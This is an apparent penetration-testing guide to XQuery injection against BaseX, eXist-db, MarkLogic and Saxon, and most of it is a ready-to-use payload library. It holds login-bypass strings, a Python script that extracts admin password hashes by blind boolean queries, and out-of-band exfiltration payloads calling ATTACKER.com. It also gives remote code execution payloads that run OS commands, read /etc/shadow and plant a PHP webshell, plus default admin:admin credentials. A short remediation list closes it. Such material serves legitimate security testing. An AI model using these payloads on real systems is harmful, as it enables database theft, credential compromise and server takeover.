XQuery Injection
Severity: High | CWE: CWE-652 OWASP: A03:2021 – Injection
What Is XQuery Injection?
XQuery is a functional query language for XML databases (BaseX, eXist-db, MarkLogic, Saxon). Like SQL injection against relational databases, XQuery injection occurs when user input is concatenated directly into an XQuery expression. The impact ranges from data extraction (full XML database dump) to RCE in some implementations that expose XQuery functions like file:write(), proc:system(), or Java class invocation.
XQuery injection is relatively rare but high impact when present — XML databases are often used for document storage, configuration management, and healthcare/government data systems where the sensitivity is extreme.
Vulnerable code (Java):
String query = "doc('users.xml')//user[username='" + input + "']";
// input = "admin' or '1'='1
// Result: doc('users.xml')//user[username='admin' or '1'='1']
// → returns all users
XQuery vs XPath injection distinction:
- XPath injection: operates on a single in-memory XML document; limited to that document
- XQuery injection: operates on a full XML database with
doc(),collection(),fn:doc-available(), external functions, and file I/O — far broader scope
Discovery Checklist
Phase 1 — Identify XML Database Usage
- Check for error messages containing “XQuery”, “BaseX”, “eXist”, “MarkLogic”, “Saxon”
- Look for response content in XML format with no REST/SOAP envelope
- Check for
.xq,.xqy,.xql,.xqmfile extensions in URLs or error traces - Look for XML-based application frameworks: Cocoon, Orbeon Forms, MarkLogic Application Server
- Check
Content-Type: application/xmlresponses to user-controlled queries
Phase 2 — Test for Injection
- Inject single quote
'→ observe parse error vs. normal response - Inject
"— XQuery supports both delimiters; test both - Inject boolean modifier:
' or '1'='1— observe result set change - Inject comment:
(:comment:)— XQuery comment syntax; if stripped → injection point - Test
]— closes a predicate; if error changes character → injection point
Phase 3 — Exploit
- Boolean-based blind extraction using
starts-with(),substring(),string-length() - Error-based extraction via type coercion (casting string to integer)
- OOB exfiltration via
http:send-request()or Java class invocation - RCE via
proc:system()(BaseX),file:write(), or Java reflection
Payload Library
Payload 1 — Detection and Auth Bypass
# Single quote injection — triggers parse error if vulnerable:
username: '
username: "
# Boolean true — bypass login, return all records:
' or '1'='1
" or "1"="1
' or 1=1 or '
') or ('1'='1
# Close predicate + inject new condition:
admin'] | //user[username='admin
admin'] or //user[role='admin
# Comment injection — XQuery block comment:
admin(:injected comment:)
' (:comment:) or '1'='1
# XQuery boolean functions:
' or true() or '
' or boolean(1) or '
' or exists(//user) or '
# Numeric comparison (when field is xs:integer):
1 or 1=1
0 or 1=1
999999 or 1=1
# Example login bypass payloads (concatenated form):
# Vulnerable query: //user[name='INPUT' and password='INPUT']
# Inject into username:
admin' or '1'='1' (:
# → //user[name='admin' or '1'='1' (:' and password='anything']
# Comment swallows the rest → returns user 'admin'
# Double-quote variant:
admin" or "1"="1" (:
Payload 2 — Boolean-Blind Data Extraction
(: XQuery boolean oracle — character-by-character extraction :)
(: Inject into a predicate field :)
(: Test if first char of first username is 'a': :)
' or substring(//user[1]/username,1,1)='a' or '1'='0
(: Test document count: :)
' or count(//user) > 5 or '1'='0
(: Extract username length: :)
' or string-length(//user[1]/username) = 5 or '1'='0
(: Extract password hash char by char: :)
' or substring(//user[username='admin']/password,1,1)='a' or '1'='0
' or substring(//user[username='admin']/password,2,1)='b' or '1'='0
(: String comparison for hex chars (MD5/SHA hash extraction): :)
' or starts-with(//user[username='admin']/password,'5f4d') or '1'='0
#!/usr/bin/env python3
"""
XQuery boolean-blind extraction oracle
"""
import requests, string, time
TARGET = "https://target.com/api/users/search"
HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
CHARSET = string.ascii_lowercase + string.digits + string.ascii_uppercase + "!@#$_-."
def probe(payload, true_indicator="found", false_indicator="not found"):
r = requests.post(TARGET, headers=HEADERS, data={"username": payload}, timeout=10)
return true_indicator.lower() in r.text.lower()
def extract_string(xquery_expr, max_len=50):
"""Extract a string value from XQuery expression using boolean oracle"""
result = ""
for pos in range(1, max_len + 1):
# First: determine character at this position
found_char = False
for char in CHARSET:
payload = f"' or substring({xquery_expr},{pos},1)='{char}' or '1'='0"
if probe(payload):
result += char
found_char = True
print(f" pos {pos}: '{char}' → {result}")
break
if not found_char:
# End of string
break
time.sleep(0.1)
return result
# Extract admin password:
print("[*] Extracting admin username:")
username = extract_string("//user[1]/username")
print(f"Username: {username}")
print("[*] Extracting admin password hash:")
password = extract_string(f"//user[username='{username}']/password")
print(f"Password: {password}")
print("[*] Extracting all document names:")
doc_count_payload = "' or count(fn:collection()) > 0 or '1'='0"
if probe(doc_count_payload):
print(" Collection exists")
Payload 3 — Error-Based Extraction
(: Error-based: cast string to integer → error message contains value :)
(: Works in Saxon, BaseX when errors are verbose :)
(: Trigger error with data in error message: :)
' or //user[1]/username cast as xs:integer or '
(: Using xs:QName for error-based: :)
' or xs:QName(//user[1]/password) or '
(: Saxon-specific: invalid cast reveals value in error: :)
' and (//user[1]/username cast as xs:integer) and '
(: MarkLogic-specific error-based: :)
' or cts:search(doc(), cts:word-query(//user[1]/password)) or '
(: BaseX doc() error — reveals filesystem paths: :)
' or doc('/nonexistent') or '
(: Error: "Document not found: /nonexistent" → confirms filesystem root :)
(: Reveal all collections: :)
' or fn:error(xs:QName('err:XPTY0004'), string(fn:collection())) or '
Payload 4 — OOB Exfiltration
(: HTTP-based OOB — eXist-db / BaseX with HTTP module :)
' or http:send-request(<http:request method='GET' href='http://ATTACKER.com/exfil?d={encode-for-uri(//user[1]/password)}'/>)[2] or '
(: BaseX HTTP module: :)
' or http:get('http://ATTACKER.com/?data=' || encode-for-uri(string-join(//user/username, ','))) or '
(: Java invocation for OOB (if Java extensions enabled): :)
' or java:java.net.URL/new('http://ATTACKER.com/?x=' || //user[1]/password)/openConnection()/connect() or '
(: MarkLogic — HTTP call: :)
' or xdmp:http-get('http://ATTACKER.com/?d=' || xdmp:quote(//user[1]/password)) or '
# Test OOB with Burp Collaborator / interactsh:
COLLAB="YOUR.oastify.com"
# Inject into search field:
curl -X POST "https://target.com/api/search" \
-d "query=%27%20or%20http%3Asend-request(%3Chttp%3Arequest%20method%3D%27GET%27%20href%3D%27http%3A%2F%2F${COLLAB}%2F%3Fdata%3D%7Bencode-for-uri(string-join(%2F%2Fuser%2Fusername%2C%27%2C%27))%7D%27%2F%3E)%5B2%5D%20or%20%271%27%3D%270"
# Monitor interactsh for DNS/HTTP callbacks:
interactsh-client -v
Payload 5 — RCE via XQuery Extension Functions
(: BaseX — proc:system() for OS command execution :)
' or proc:system('id') or '
' or proc:system('curl http://ATTACKER.com/?x=$(id|base64)') or '
(: BaseX — file module for file read: :)
' or file:read-text('/etc/passwd') or '
' or string(file:read-text('/etc/shadow')) or '
(: BaseX — file:write() for webshell: :)
' or file:write('/var/www/html/shell.php','<?php system($_GET[c]);?>') or '
(: eXist-db — Java class invocation: :)
(: Requires Java extensions enabled — common in older installs :)
' or java:java.lang.Runtime.getRuntime().exec('id') or '
(: MarkLogic — xdmp:eval() for code injection: :)
' or xdmp:eval('xdmp:http-get("http://ATTACKER.com/?x=" || xdmp:quote(//secrets/key))') or '
(: MarkLogic — xdmp:spawn() for async code exec: :)
' or xdmp:spawn-function(function() { xdmp:http-get("http://ATTACKER.com/rce") }) or '
(: Saxon — dynamic evaluation (if enabled): :)
' or saxon:eval(saxon:expression('proc:system("id")')) or '
(: Read application config (common XQuery target): :)
' or doc('../WEB-INF/web.xml')//param-value[1] or '
' or doc('/db/config/conf.xml')//adminPassword or '
Payload 6 — Collection / Database Enumeration
(: List all accessible documents: :)
' or fn:base-uri(collection()[1]) or '
(: List all document URIs: :)
' or string-join(for $d in collection() return fn:base-uri($d), ',') or '
(: Count documents in collection: :)
' or count(collection()) > 10 or '
(: eXist-db — list all collections: :)
' or xmldb:get-child-collections('/db') or '
(: BaseX — list open databases: :)
' or db:list() or '
(: Access a specific named database: :)
' or db:open('production')//credentials/password or '
(: MarkLogic — list all databases: :)
' or xdmp:databases() or '
' or xdmp:database-name(xdmp:databases()[1]) or '
Tools
# xcat — XPath/XQuery injection automation (supports XQuery mode):
pip3 install xcat
xcat run https://target.com/search --query "?search=" \
--true-string "Result found" --false-string "No results"
# Manual testing with curl — injection in GET parameter:
curl "https://target.com/api/query?username=%27%20or%20%271%27%3D%271"
# BaseX HTTP API (if BaseX is directly exposed on port 8984):
curl "http://TARGET:8984/rest/db?query=%27%20or%20count(collection())%20%3E%200%20or%20%271%27%3D%270"
# eXist-db REST API (port 8080):
curl "http://TARGET:8080/exist/rest/db?_query=%27%20or%20%271%27%3D%271"
# MarkLogic REST API (port 8000):
curl -u admin:admin "http://TARGET:8000/v1/eval" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'xquery=//user/username'
# Detect XQuery engine from error messages:
for payload in "'" '"' "(:test:)" "xs:integer('x')"; do
r=$(curl -s "https://target.com/search?q=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$payload'))")")
echo "Payload: $payload → $(echo $r | head -c 200)"
done
# Burp Suite — use Intruder with XQuery payload list:
# SecLists doesn't have XQuery specific lists — use XPath list as base:
# /usr/share/seclists/Fuzzing/XPath.txt
# Adapt by replacing XPath functions with XQuery equivalents
# If BaseX is exposed (default port 1984 — TCP binary protocol):
# Use BaseX client:
pip3 install pybasex
python3 -c "
from BaseXClient import Session
s = Session('TARGET', 1984, 'admin', 'admin')
print(s.execute('XQUERY //user/password'))
s.close()
"
Remediation Reference
- Parameterized XQuery: use the database driver’s variable binding mechanism — never concatenate user input into XQuery strings; in Java use
XQPreparedExpressionwithbindString() - Input validation: restrict user input to expected character sets; reject quotes, parentheses, and XQuery keywords at the input layer
- Principle of least privilege: the XQuery execution context should only have read access to the documents it needs — disable
proc:,file:,http:, and Java extension modules unless required - Disable dangerous modules: in BaseX, disable
procandfilemodules; in eXist-db, restrict Java class access; in MarkLogic, restrictxdmp:eval()to admin roles - Error handling: never expose XQuery error messages to clients — log server-side, return generic error codes to users
- WAF rules: detect XQuery-specific patterns:
or '1'='1,fn:doc(,collection(,(:,)sequences in query parameters
Part of the Web Application Penetration Testing Methodology series.